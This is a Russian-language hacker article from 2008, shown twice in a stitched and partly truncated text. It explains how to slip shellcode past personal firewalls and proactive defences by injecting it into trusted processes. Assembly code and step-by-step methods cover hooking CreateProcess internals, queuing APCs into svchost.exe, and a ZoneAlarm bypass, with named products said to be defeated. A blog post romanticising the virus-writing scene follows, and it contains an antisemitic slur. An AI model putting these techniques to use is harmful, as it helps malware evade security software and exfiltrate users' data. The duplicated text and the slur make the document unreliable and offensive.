оставшись незамеченным для проактивной защиты, которая стемится закрыть все методы,
которые используются для инжекта. Теперь опишем конкретные атаки, которые применимы
для конкретных фаерволов.

Общий код инжекта
=================
Инжект всегда состоит их двух этапов:
1) Запись кода в адресное простанство процесса-жертвы
2) Передача управления записанному коду

Этапы эти могут быть любого вида — явные или косвенные и использовать
любые доступные технические приемы. Если каждый из этапов не обнаруживается защитой,
то можно осуществить инжект. При этом каждый этап обязателен, без любого из них
инжект не будет осуществлен.

CreateProcess
=============
Алгоритм следущий — хукаем в своем процессе из NTDLL — ZwCreateSection,
ZwQuerySection и создаем процесс с помощью CreateProcess. До возврата из
CreateProcess вызываются хукнутые ZwCreateSection/ZwQuerySection. Тут надо
смотреть внутрь механима создания процесса — когда создается процесс, то
один из этапов — открытие файла EXE-файла и проецирование его на адресное
пространство создаваемого процесса. Создание проекции делается функцией ZwCreateSection.
В этот момент в перехватчике функции ZwCreateSection можно писать любые данные
с помощью той же KERNEL32!WriteProcessMemory и при этом проактивная защита
будет молчать. Далее после создания проекции, код CreateProcess получает точку
входа (Entry Point) нового процесса (т.е. его первичного потока) с помощью функции
ZwQuerySection. Перехватчик ZwQuerySection возвращает точку входа, но не реальную —
взятую из опционального заголовка — а лживую — а именно адрес нашего кода, который
необходимо выполнить. Т.о. образом когда функция CreateProcess завершит работу будет
исполнятся наш код, который отправит данные куда надо в контексте доверенного приложения.

Хорошо. Тут есть некоторые моменты, на которые я хотел бы обратить внимание.
В обработчике ZwCreateSection не всегда можно писать с помощью WriteProcessMemory,
некоторыми защитами это обнаруживается. В этом случае можно перехватить также и
WriteProcessMemory, которая также вызывается внутри CreateProcess. Когда
создается процесс в него пишутся переменные окружения родительского процесса,
если не указаны явно переменные окружения. Вот в этом месте перехватывая WriteProcessMemory
можно записать свой shellcode. Тоже самое с PEB. Еще проще просто указать параметром —
lpEnvironment адрес нашего шелкода. Хорошо. Но это тоже не всегда работает.
Существует способ записи, который пока работает всегда — если удается успешно создать процесс.
Алгоритм записи следующий:

1) Вызов CreateProcess с флагом CREATE_SUSPENDED
2) Создание файла, запись shellcode в файл
3) Создание проекции файла с шелкодом с помощью NtCreateSection
4) Проецирование файла на адресное пространство приостановленного процесса с помощью NtCreateSection

Способ хоть и известный, но далеко все авторы защит его пока прикрыли. Многие защиты
блокируют создание сетевого процесса, а некоторые вообще создание процесса.
Но не все. Например, известный Kaspersky Internet Security 7.0.0.125 поддается на
эту атаку. Также на эту атаку поддаются ранние версии Agnitum Outpost (и Outpost 2008
если удастся успешно создать процесс). Ну и куча заморских фаерволов такие как Norton
Internet Security 2008, Bit Defender Total Security 2008, Zone Alarm 7 на средних настройках
(на максимуме блокирует), Agava Firewall, Ashampoo Firewall, AhnLab V3 Internet Security 2007,
Black ICE PC Protection 3,6, Look'n'Stop 2,06, Normal Personal Firewall 1,4, Visnetic Firewall
3,0 и т.д. и т.д.

Перейдем к практической реализации данного метода. Браузер по умолчанию получаем
с помощью доступа к ключу по умолчанию в разедел «http\shell\open\command»:

lea ecx,[hKey]
push ecx
push KEY_READ
push 0
lea ecx,[SubKey]
push ecx
push HKEY_CLASSES_ROOT
call RegOpenKeyEx

lea ecx,[cbData]
push ecx
lea ecx,[Buffer]
push ecx
push NULL
push NULL
push NULL
push [hKey]
call RegQueryValueEx

После исполнения данного кода в буффере будет путь к браузеру по умолчанию.
Далее создаем процесс в приостановленом состоянии:

lea eax,[pi]
push eax
lea eax,[si]
push eax
push NULL
push NULL
push CREATE_SUSPENDED
push 0
push NULL
push NULL
lea eax,[Buffer]
push eax
push NULL
call CreateProcess

Далее создаем проекцию файла и проецируем ее на адресное пространство созданного процесса:

push [hFile]
push 0x8000000;SEC_COMMIT
push PAGE_EXECUTE_READWRITE
push NULL
push NULL
push SECTION_ALL_ACCESS
lea eax,[hSection]
push eax
call NtCreateSection

push PAGE_EXECUTE_READWRITE
push 0
push 1;ViewShare
mov [ViewSize],0
lea ecx,[ViewSize]
push ecx
push NULL
push 0
push 0
push [ebx+FreeBaseAddress-NormalCodeStart]
pop [BaseAddress]
lea ecx,[BaseAddress]
push ecx
push [pi + PROCESS_INFORMATION.hProcess]
push [hSection]
call NtMapViewOfSection

Вот здесь выявляется проблема. По какому адресу спроецировать shellcode. Ведь
уже в этот момент мы должны были изменить точку входа на адрес нашего шелкода
(до возврата из CreateProcess в перехватчике NtQuerySection). Пусть это будет предварительно
выбранный адрес — константа, который по тестам не конфликтует с имеющимися проекциями.
Но это будет явно не стабильно, т.к. конфликты могут быть и необходимо предусмотреть
их отсутствие. Поэтому мы делаем следующим образом. Первый раз вызываем CreateProcess
с флагом CREATE_SUSPENDED без хука NtCreateSecion/NtQuerySection, потом делаем проекцию по адресу,
который выберет система и запоминаем его. После этого уничтожаем процесс. Далее создаем
процесс уже с хуками нужных функций, но уже зная адрес проекции. После создания процесса
делаем проекцию по уже известному адресу. Т.о. мы делаем тест конфликта для данной системы.
Это должно минимизировать совпадения адресов проекции нашего шелкода и другой выделенной на
данной момент памяти. После этог обход можно считать оконченным. Дальше остается только
возобновить выполнение первичного потока (т.к. мы создавали процесс у которого первичный поток
находится в приостановленном состоянии):

push [pi + PROCESS_INFORMATION.hThread]
call ResumeThread

NtQueueApcThread
================
На вызове этой функции основан обход почти всех существующий сейчас проактивных защит и
фаерволов, какими бы мощными они не казались. Вот алгоритм обхода:

1) Создаем DLL с именем совпадающим последними буквами с DLL, которая есть в
импорте SVCHOST.EXE, например «ERNEL32.DLL» . В DLL должен быть shellcode для
исполнения в контексте SVCHOST.EXE (это приложение в правилах всех фаерволов
может также проявлять активность как и Internet Explorer).

2) Ищем в адресном пространстве процесса SVCHOST.EXE строку «ERNEL32.DLL». Можно
делать это сканированием вызовом функции ReadProcessMemory (для этого предварительно
надо открыть SVCHOST — OpenProcess(PROCESS_VM_READ)). Другой и более качественный
способ поиска строки — спроецировать файл SVCHOST.EXE себе в адресное пространство —
и найти в таблице импорта строку «ERNEL32,32». Складывая относительный адрес строки с
базовым адресом модуля по умолчанию (ImageBase в опциональном заголовке)
получаем адрес нужной строки.

3) Перебираем потоки процесса SVCHOST.EXE и делаем вызов для каждого из них NtQueueApcThread.
Эта функция добавляет потоку APC — вызов асинхронной процедуры. Но у функции есть ограничение
- процедура выполняется только в случае если поток перешел в режим Alartable. Этот факт
обуславливает выбор процесса SVCHOST.EXE в качестве жертвы исполнения shellcode. При исследовании
стало понятно, что во всех версиях Windows 2000/XP процесс SVCHOST.EXE имеет Alertable-потоки
и при этом SVCHOST.EXE является доверенным приложением с возможной сетевой активностью, что
явно дает право выбрать его в качестве жертвы. Также неободимо сказать, что процесс SVCHOST.EXE
существует в системе всегда, в противном случае ОС попадает в BSOD (если убить один из SVCHOST.EXE).
Вот прототип функции NtQueueApcThread:

proc NtQueueApcThread hThread, FunctionAddress, Par1, Par2, Par3

Функция добавляет в очередь асинхронных процедур новую асинхронную процедуру с конвецией
вызова STDCALL и с передачей трех параметров Par1, Par2, Par3. Интересно, но есть функция,
которая очень точно нам подоходит и также принимает три параметра — LoadLibraryEx. Т.о. мы
просто загружаем DLL в адресное пространство процесса SVCHOST.EXE.

4) Из самой DLL нельзя что-либо делать, т.к. это обнаружение контролем компонентов.
Поэтому что все мы делаем в DLLMain это — копируем shellcode из своего тела, и сохраняем в
файл с известным именем TID и адрес shellcode. Далее после проделанных действий DLL нужно удалить.

5) Открываем файл созданный внутри DllMain — и ставим в очередь известного потока
(его TID записан в файле) адрес процедуры, который также известен. после этого обход закончен.

Этот обход преодолевает уже и Comodo Firewall 2,4 и Agnitum Outpost 2008 и все названные
в предыдущем разделе защиты. Остались при этом живы Jetico и Tiny — об обходе этих защит
здесь говорить ничего не буду, т.к. это отдельный разговор. Zone Alarm 7 в параноидальном
режиме ловит этот вид обхода — а именно не дает открыть поток для посылки в него APC,
но для него был сделан отдельных обход, который я опишу ниже.

Zone Alarm
==========
У ZoneAlarm особая модель — Trusted Application. Если исполнять что-либо в контексте
Super Trusted приложений, то ZA не обратит на это внимание. Одно из таких Super
Trusted приложений — это EXPLORER.EXE. У ZA особая модель защиты — она не мучается
перехватывать кучу функций в SDT относительно потоков и процессов — она просто не дает
открывать процесс и поток с видами доступа, которые могут привести к нарушению безопасности.
Т.е. если открывать процесс или поток, то ZA будет ругатся. Но была найдена ошибка,
которая позволяет все таки открыть процесс. Вот алгоритм:

1) Открываем процесс с правами DUP_HANDLE — это ZA позволяет.

2) Перечисляем описатели EXPLORER.EXE в поисках описателя одного из потоков EXPLORER.EXE в нем.
Смотрим права для описателя — если они максимальны, то делаем вызов DuplicateHandle.
Т.о. мы получаем описатель потока с максимальными привилегиями.

3) Теперь можно сделать инжект. Передать управление мы можем с помощью функции SetThreadContext,
описатель потока у нас есть. Но чтобы в процесс записать данные надо исопльзовать отдельную технику,
которая общедоступна. О ней в следующем пункте.

4) При перечислении описателей получаем описатель порта. У EXPLORER.EXE во всех версиях
имеется порт. После получения описателя порта получаем его имя. После этого вызовом
NtConnectPort и созданием секции в которой находится наш shellcode проекция файла с shellcode
волшебным образом окажется в адресном пространстве процесса EXPLORER.EXE.

5) Используем SetThreadContext для передачи управления нашему shellcode.

6) Т.к. от имени EXPLORER.EXE можно делать разные системные вещи (но нельзя проявлять сетевую активность)
без опасения тревоги ZA, то используем метод с названием CreateProcess описанный выше для
окончательного обхода ZA на параноидальных настройках.

Видно, что обход основан на том, что возможно все таки получить описатель потока без
обнаружения ZA. При этом нам повезло, что процесс EXPLORER имеет в себе свои же описатели
потоков с максимальными привилениями, а также имеет порт, подключение к которому позволяет
записать данные shellcode в адресное пространство процесса-жертвы используя ранее публично доступный
метод. При исследонии ZA было также обнаружено, что ZA позволяет открыть процесс СTFMON.EXE с максимальными
привилегиями без предупреждения пользователя. Это факт также легко может использоваться для обхода ZA.
Но CTFMON.ExE не всегда запущен (хоть и очень часто — сама Windows прописывает его в автозагрузку при установке),
и появился только в Windows XP, поэтому этот способ не очень универсален(не может быть использован на
Windows 2000), хотя и может применятся с успехом в Windows XP. Также на Windows XP SP2 было обнаружено,
что процесс EXPLORER.EXE имеет свой же описатель с максимальными привилегиями, после его получения
возможно делать с процессом любые манипуляции. Но после дальнейших тестов было обнаружено, что это
ошибка именно Service Pack 2, и на Service Pack 1 этот недочет не обнаружен так же как и на обычной Windows XP RTM.

Greets to Ms-Rem, EP_XOFF, Tyler Durden, deadbody,который
чувствует исследователь и взломщик. Конечно, все эти техники используются
некоторое количество времени в виде приватных утилит. До этого времени
подобная информация не появлялась в таком количестве, качестве и концентрате.
Многое было сделано до меня другими исследователями. За это надо сказать им спасибо.
За их смелость выложить на публичное мнение свои
уникальные разработки. Обход описанный тут раннее нигде не появлялся,
но базируется на некоторых известных техниках. Чтож приступим.

Теория
======
Что такое обход защиты? Это возможность выполнять действия, которые запрещает защита.
Тут нет правил и законов, есть просто задача добиться результата.
Существует негласная война между авторами фаерволов и проактивных защит с взломщиками.
Конечно, само существование данной войны очевидно. Отмечу, что здесь рассматривается
только материал применимый к ОС семейства Windows NT, хотя теоретические принципы
могут быть использованы для обхода любой защиты, которая строится на основе
модели архитектуры современных фаерволов. Кратко опишем эту модель.

На компьютере жертвы установлен фаервол, который имеет как модуль — проактивную защиту.
Поведение (блокирование и разрешение) фаервола определяется набором правил. Правила
бывают обычно двух видов — глобальные правила и правила для приложений. Если говорить
в общем, то в основе обхода любой защиты лежат мысли о 1) допущениях, 2) исключениях или
3) ошибках сделанных разработчиками защиты. Эти три вещи дают обход практически любой
защиты. А как изввестно не было еще такой защиты, которую не сломали. Если рассматривать
персональные фаерволы в этом разрезе, то получим такую схему действий исследования —
искать и использовать три вышеперечисленных пункта. Если поиск успешен, то мы победили.

Из всего сказано следует слудующее — чтобы обойти персональный фаервол необходимо
либо использовать существующие правила, либо разрушить модель правил, либо использовать
ошибку в ПО защиты. С ошибками в ПО сложнее всего. Во-первых они не универсальны,
во-вторых их сложно найти и использовать. Наиболее лучший обход использует минимум
недокументированных функций и структур и применим ко всем защитам, т.е. универсален.
Я такого обхода не дам :) Поэтому будем использовать недокументированные техники,
но при этом относительно универсальные. Вернемся к правилам фаервола — чтобы их
нарушить достаточно попасть в ring0, на этом защита заканчивается. Чтобы использовать
существующие правила в своих целях мы используем общую технику известную давно называемую
инжектом. Т.е. исполнение кода в контексте доверенного приложения. Так, если мы каким-либо
образом заставим доверенное приложение Internet Explorer выполнить наш код, мы сможем
отправить данные в обход защиты. Вообще универсально надо брять браузер по умолчанию
и его использовать как жертву исполнения нашего кода. И конечно в своем инжектированном
коде мы используем правила, которые имеются в фаерволе относительно Internet Explorer
(например, исходящие на 80 порт). Теперь дело за малым — выполнить инжект при этом
оставшись незамеченным для проактивной защиты, которая стемится закрыть все методы,
которые используются для инжекта. Теперь опишем конкретные атаки, которые применимы
для конкретных фаерволов.

Общий код инжекта
=================
Инжект всегда состоит их двух этапов:
1) Запись кода в адресное простанство процесса-жертвы
2) Передача управления записанному коду

Этапы эти могут быть любого вида — явные или косвенные и использовать
любые доступные технические приемы. Если каждый из этапов не обнаруживается защитой,
то можно осуществить инжект. При этом каждый этап обязателен, без любого из них
инжект не будет осуществлен.

CreateProcess
=============
Алгоритм следущий — хукаем в своем процессе из NTDLL — ZwCreateSection,
ZwQuerySection и создаем процесс с помощью CreateProcess. До возврата из
CreateProcess вызываются хукнутые ZwCreateSection/ZwQuerySection. Тут надо
смотреть внутрь механима создания процесса — когда создается процесс, то
один из этапов — открытие файла EXE-файла и проецирование его на адресное
пространство создаваемого процесса. Создание проекции делается функцией ZwCreateSection.
В этот момент в перехватчике функции ZwCreateSection можно писать любые данные
с помощью той же KERNEL32!WriteProcessMemory и при этом проактивная защита
будет молчать. Далее после создания проекции, код CreateProcess получает точку
входа (Entry Point) нового процесса (т.е. его первичного потока) с помощью функции
ZwQuerySection. Перехватчик ZwQuerySection возвращает точку входа, но не реальную —
взятую из опционального заголовка — а лживую — а именно адрес нашего кода, который
необходимо выполнить. Т.о. образом когда функция CreateProcess завершит работу будет
исполнятся наш код, который отправит данные куда надо в контексте доверенного приложения.

Хорошо. Тут есть некоторые моменты, на которые я хотел бы обратить внимание.
В обработчике ZwCreateSection не всегда можно писать с помощью WriteProcessMemory,
некоторыми защитами это обнаруживается. В этом случае можно перехватить также и
WriteProcessMemory, которая также вызывается внутри CreateProcess. Когда
создается процесс в него пишутся переменные окружения родительского процесса,
если не указаны явно переменные окружения. Вот в этом месте перехватывая WriteProcessMemory
можно записать свой shellcode. Тоже самое с PEB. Еще проще просто указать параметром —
lpEnvironment адрес нашего шелкода. Хорошо. Но это тоже не всегда работает.
Существует способ записи, который пока работает всегда — если удается успешно создать процесс.
Алгоритм записи следующий:

1) Вызов CreateProcess с флагом CREATE_SUSPENDED
2) Создание файла, запись shellcode в файл
3) Создание проекции файла с шелкодом с помощью NtCreateSection
4) Проецирование файла на адресное пространство приостановленного процесса с помощью NtCreateSection

Способ хоть и известный, но далеко все авторы защит его пока прикрыли. Многие защиты
блокируют создание сетевого процесса, а некоторые вообще создание процесса.
Но не все. Например, известный Kaspersky Internet Security 7.0.0.125 поддается на
эту атаку. Также на эту атаку поддаются ранние версии Agnitum Outpost (и Outpost 2008
если удастся успешно создать процесс). Ну и куча заморских фаерволов такие как Norton
Internet Security 2008, Bit Defender Total Security 2008, Zone Alarm 7 на средних настройках
(на максимуме блокирует), Agava Firewall, Ashampoo Firewall, AhnLab V3 Internet Security 2007,
Black ICE PC Protection 3,6, Look'n'Stop 2,06, Normal Personal Firewall 1,4, Visnetic Firewall
3,0 и т.д. и т.д.

Перейдем к практической реализации данного метода. Браузер по умолчанию получаем
с помощью доступа к ключу по умолчанию в разедел «http\shell\open\command»:

lea ecx,[hKey]
push ecx
push KEY_READ
push 0
lea ecx,[SubKey]
push ecx
push HKEY_CLASSES_ROOT
call RegOpenKeyEx

lea ecx,[cbData]
push ecx
lea ecx,[Buffer]
push ecx
push NULL
push NULL
push NULL
push [hKey]
call RegQueryValueEx

После исполнения данного кода в буффере будет путь к браузеру по умолчанию.
Далее создаем процесс в приостановленом состоянии:

lea eax,[pi]
push eax
lea eax,[si]
push eax
push NULL
push NULL
push CREATE_SUSPENDED
push 0
push NULL
push NULL
lea eax,[Buffer]
push eax
push NULL
call CreateProcess

Далее создаем проекцию файла и проецируем ее на адресное пространство созданного процесса:

push [hFile]
push 0x8000000;SEC_COMMIT
push PAGE_EXECUTE_READWRITE
push NULL
push NULL
push SECTION_ALL_ACCESS
lea eax,[hSection]
push eax
call NtCreateSection

push PAGE_EXECUTE_READWRITE
push 0
push 1;ViewShare
mov [ViewSize],0
lea ecx,[ViewSize]
push ecx
push NULL
push 0
push 0
push [ebx+FreeBaseAddress-NormalCodeStart]
pop [BaseAddress]
lea ecx,[BaseAddress]
push ecx
push [pi + PROCESS_INFORMATION.hProcess]
push [hSection]
call NtMapViewOfSection

Вот здесь выявляется проблема. По какому адресу спроецировать shellcode. Ведь
уже в этот момент мы должны были изменить точку входа на адрес нашего шелкода
(до возврата из CreateProcess в перехватчике NtQuerySection). Пусть это будет предварительно
выбранный адрес — константа, который по тестам не конфликтует с имеющимися проекциями.
Но это будет явно не стабильно, т.к. конфликты могут быть и необходимо предусмотреть
их отсутствие. Поэтому мы делаем следующим образом. Первый раз вызываем CreateProcess
с флагом CREATE_SUSPENDED без хука NtCreateSecion/NtQuerySection, потом делаем проекцию по адресу,
который выберет система и запоминаем его. После этого уничтожаем процесс. Далее создаем
процесс уже с хуками нужных функций, но уже зная адрес проекции. После создания процесса
делаем проекцию по уже известному адресу. Т.о. мы делаем тест конфликта для данной системы.
Это должно минимизировать совпадения адресов проекции нашего шелкода и другой выделенной на
данной момент памяти. После этог обход можно считать оконченным. Дальше остается только
возобновить выполнение первичного потока (т.к. мы создавали процесс у которого первичный поток
находится в приостановленном состоянии):

push [pi + PROCESS_INFORMATION.hThread]
call ResumeThread

NtQueueApcThread
================
На вызове этой функции основан обход почти всех существующий сейчас проактивных защит и
фаерволов, какими бы мощными они не казались. Вот алгоритм обхода:

1) Создаем DLL с именем совпадающим последними буквами с DLL, которая есть в
импорте SVCHOST.EXE, например «ERNEL32.DLL» . В DLL должен быть shellcode для
исполнения в контексте SVCHOST.EXE (это приложение в правилах всех фаерволов
может также проявлять активность как и Internet Explorer).

2) Ищем в адресном пространстве процесса SVCHOST.EXE строку «ERNEL32.DLL». Можно
делать это сканированием вызовом функции ReadProcessMemory (для этого предварительно
надо открыть SVCHOST — OpenProcess(PROCESS_VM_READ)). Другой и более качественный
способ поиска строки — спроецировать файл SVCHOST.EXE себе в адресное пространство —
и найти в таблице импорта строку «ERNEL32,32». Складывая относительный адрес строки с
базовым адресом модуля по умолчанию (ImageBase в опциональном заголовке)
получаем адрес нужной строки.

3) Перебираем потоки процесса SVCHOST.EXE и делаем вызов для каждого из них NtQueueApcThread.
Эта функция добавляет потоку APC — вызов асинхронной процедуры. Но у функции есть ограничение
- процедура выполняется только в случае если поток перешел в режим Alartable. Этот факт
обуславливает выбор процесса SVCHOST.EXE в качестве жертвы исполнения shellcode. При исследовании
стало понятно, что во всех версиях Windows 2000/XP процесс SVCHOST.EXE имеет Alertable-потоки
и при этом SVCHOST.EXE является доверенным приложением с возможной сетевой активностью, что
явно дает право выбрать его в качестве жертвы. Также неободимо сказать, что процесс SVCHOST.EXE
существует в системе всегда, в противном случае ОС попадает в BSOD (если убить один из SVCHOST.EXE).
Вот прототип функции NtQueueApcThread:

proc NtQueueApcThread hThread, FunctionAddress, Par1, Par2, Par3

Функция добавляет в очередь асинхронных процедур новую асинхронную процедуру с конвецией
вызова STDCALL и с передачей трех параметров Par1, Par2, Par3. Интересно, но есть функция,
которая очень точно нам подоходит и также принимает три параметра — LoadLibraryEx. Т.о. мы
просто загружаем DLL в адресное пространство процесса SVCHOST.EXE.

4) Из самой DLL нельзя что-либо делать, т.к. это обнаружение контролем компонентов.
Поэтому что все мы делаем в DLLMain это — копируем shellcode из своего тела, и сохраняем в
файл с известным именем TID и адрес shellcode. Далее после проделанных действий DLL нужно удалить.

5) Открываем файл созданный внутри DllMain — и ставим в очередь известного потока
(его TID записан в файле) адрес процедуры, который также известен. после этого обход закончен.

Этот обход преодолевает уже и Comodo Firewall 2,4 и Agnitum Outpost 2008 и все названные
в предыдущем разделе защиты. Остались при этом живы Jetico и Tiny — об обходе этих защит
здесь говорить ничего не буду, т.к. это отдельный разговор. Zone Alarm 7 в параноидальном
режиме ловит этот вид обхода — а именно не дает открыть поток для посылки в него APC,
но для него был сделан отдельных обход, который я опишу ниже.

Zone Alarm
==========
У ZoneAlarm особая модель — Trusted Application. Если исполнять что-либо в контексте
Super Trusted приложений, то ZA не обратит на это внимание. Одно из таких Super
Trusted приложений — это EXPLORER.EXE. У ZA особая модель защиты — она не мучается
перехватывать кучу функций в SDT относительно потоков и процессов — она просто не дает
открывать процесс и поток с видами доступа, которые могут привести к нарушению безопасности.
Т.е. если открывать процесс или поток, то ZA будет ругатся. Но была найдена ошибка,
которая позволяет все таки открыть процесс. Вот алгоритм:

1) Открываем процесс с правами DUP_HANDLE — это ZA позволяет.

2) Перечисляем описатели EXPLORER.EXE в поисках описателя одного из потоков EXPLORER.EXE в нем.
Смотрим права для описателя — если они максимальны, то делаем вызов DuplicateHandle.
Т.о. мы получаем описатель потока с максимальными привилегиями.

3) Теперь можно сделать инжект. Передать управление мы можем с помощью функции SetThreadContext,
описатель потока у нас есть. Но чтобы в процесс записать данные надо исопльзовать отдельную технику,
которая общедоступна. О ней в следующем пункте.

4) При перечислении описателей получаем описатель порта. У EXPLORER.EXE во всех версиях
имеется порт. После получения описателя порта получаем его имя. После этого вызовом
NtConnectPort и созданием секции в которой находится наш shellcode проекция файла с shellcode
волшебным образом окажется в адресном пространстве процесса EXPLORER.EXE.

5) Используем SetThreadContext для передачи управления нашему shellcode.

6) Т.к. от имени EXPLORER.EXE можно делать разные системные вещи (но нельзя проявлять сетевую активность)
без опасения тревоги ZA, то используем метод с названием CreateProcess описанный выше для
окончательного обхода ZA на параноидальных настройках.

Видно, что обход основан на том, что возможно все таки получить описатель потока без
обнаружения ZA. При этом нам повезло, что процесс EXPLORER имеет в себе свои же описатели
потоков с максимальными привилениями, а также имеет порт, подключение к которому позволяет
записать данные shellcode в адресное пространство процесса-жертвы используя ранее публично доступный
метод. При исследонии ZA было также обнаружено, что ZA позволяет открыть процесс СTFMON.EXE с максимальными
привилегиями без предупреждения пользователя. Это факт также легко может использоваться для обхода ZA.
Но CTFMON.ExE не всегда запущен (хоть и очень часто — сама Windows прописывает его в автозагрузку при установке),
и появился только в Windows XP, поэтому этот способ не очень универсален(не может быть использован на
Windows 2000), хотя и может применятся с успехом в Windows XP. Также на Windows XP SP2 было обнаружено,
что процесс EXPLORER.EXE имеет свой же описатель с максимальными привилегиями, после его получения
возможно делать с процессом любые манипуляции. Но после дальнейших тестов было обнаружено, что это
ошибка именно Service Pack 2, и на Service Pack 1 этот недочет не обнаружен так же как и на обычной Windows XP RTM.

Greets to Ms-Rem, EP_XOFF, Tyler Durden, deadbody

FEEBACK
=======
mail: evilphreak.blog.ru
web: evil_phreak@mail.ru

© EvilPhreak, 2008

FEEBACK
=======
mail: evilphreak.blog.ru
web: evil_phreak@mail.ru

© EvilPhreak, 2008

VX-Сцена

Fri, 28 Dec 2007 08:01:04 GMT

На улице конец 2007 года. На носу 2008-ой. Мысли о сцене наполнили голову.
Что такое VX-сцена?

Сцена - это то, что творится вокруг VX. Одно можно сказать сейчас точно - сцена умерла
полностью. Воскреснет ли она? Теоритически это возможно. На практике ощущается точно

и четкое мощнейшее влияние money-фактора не сцену. Только этот фактор убил ее в начале,

и не дает восреснуть сейчас. 29A умерли, хоть и обещали издать журнал в начале 2007 года.

Обещание не сдержали, да и не кому его сдерживать — остались там одни cтарички-импотенты.

Раньше было иначе, но время их убило, убило их горячие, пылкие и терпеливые сердца, которые были наполнены лишь одной жаждой — творить.
VX в моем сейчас уже достаточно опытном взляде ничто иное как ценный,
вкусный креатиф области системного программирования,
в основном вирусописательства, реверсинга, эксплуатации программного обеспечения, конечно — руткито-строения(и аналогичных stealth-техник)
и всех других связанных с этими темами техник.
Креатиф, который мог стоить кучу денег, но он был раскрыт лишь с одной целью. Цель это мне трудно озвучить — это та вещь, которая позволяет гениальным художникам создавать гениальные картины и не за деньги, а просто так. Желание творить лучшее не беря за это практически ничего. Преданность своему делу.

Смерть 29A прошла для сообщества как бы и незаметно, людям это неинтересно. И вообще кажется, что после смерти 29A умерли и люди, для которых она что-то значила. Не только группа, но и сцена вообще. Умер WASM.RU. Не сайт умер, умерли люди, которые вливали в него новую кровь. Их больше нет, нет их постов, и материалов. Умер ROOTKIT.COM. Месяцами там не появляются статьи. И что-то более-менее стоящее не появлялось наверное уже год. Да, появился ROOTKITS.RU. Но это отрыжка пока и ничего более. Хотя, были недавно совсем люди, которые все таки пускали новую кровь, веселили нас и делали своим существование ту вещь, которую мы называем сценой — это например EP_XOFF. Но он тоже умер и больше его никогда не будет. Умерли BHC, очень яркий и живой пример живности выросшей внутри сцены, как-то даже создающей её. Умер Ms-Rem, человек, который подарил время для жизни сцены. Мир затих. Нет прежней шумихи, нет сумашедшего ажиотажа вокруг VX и STEALTH технологий.

Что случилось? Ответ прост. Сцена жестока, она не хочет существовать сама по себе,
она строится на голом энтузиазме и живет на нем, им питается и хочет поглатить его.
А энтузиазма этого уже нет. Или он есть, но его сожрала та самая сцена, бескопромисная, страшная и жестокая сцена.

Есть плюсы — сцена все таки что-то отдает. Отдает она память об ушедших героях. Память о них будет сохранена в наших сердцах. Мы помним о Z0MBiE, Ms-Rem'е, их творениях, изайны BHC перечитываются перед сном и будут перечитываться далее, это стало нашим духовным достоянием, без которого уже нет существования. История сцены мать её.

Будем верить и надеятся, что появятся новые герои, им можешь быть ты. Пусть сгорят в оду одепты денег, хотя мы все ими являемся. Сложно быть человеком, который идет протев, им был Зомба, им был Рем, им был Володуа. Зомба сохранял потенцию в течении 10 лет. Он по праву считается нашим отцом, который посеял землю для многих-многих других VX-ов. Ведь он наш соотечественник. Человек, который отдал свою жизнь сцене,
так не сделал еще никто. Мы помним и ценим это.

Наверное это та цель к которой можно и нужно стремится. Не знаю, что будет чувствовать зомба когда умрет — но я думаю он не зря прожил свои молодые годы. Еще в далеком 1996 году его имя появилось в 29#2 и оставалось там до 8-го номера целых 10 лет!

Что сейчас? Сейчас жидохэкеры пишут свои ничтожные статейки, материал которых базируется на исследованиях 10ти летней давности. Причем это пережовывается много-много раз разными словами. Конечно — исследования продолжаются, но они ушли в подполье, все коды работают и исполняют свое единственное дело - зарабатывание денег. Кто-то просто обиделся на сцену, кто-то хочет быть богатым.

Можно ли обвинять кодесописателей в этом? Конечно нет. Скорее 29A,
просто делали нам большие подарки в свое время, и мы за это благодарны им.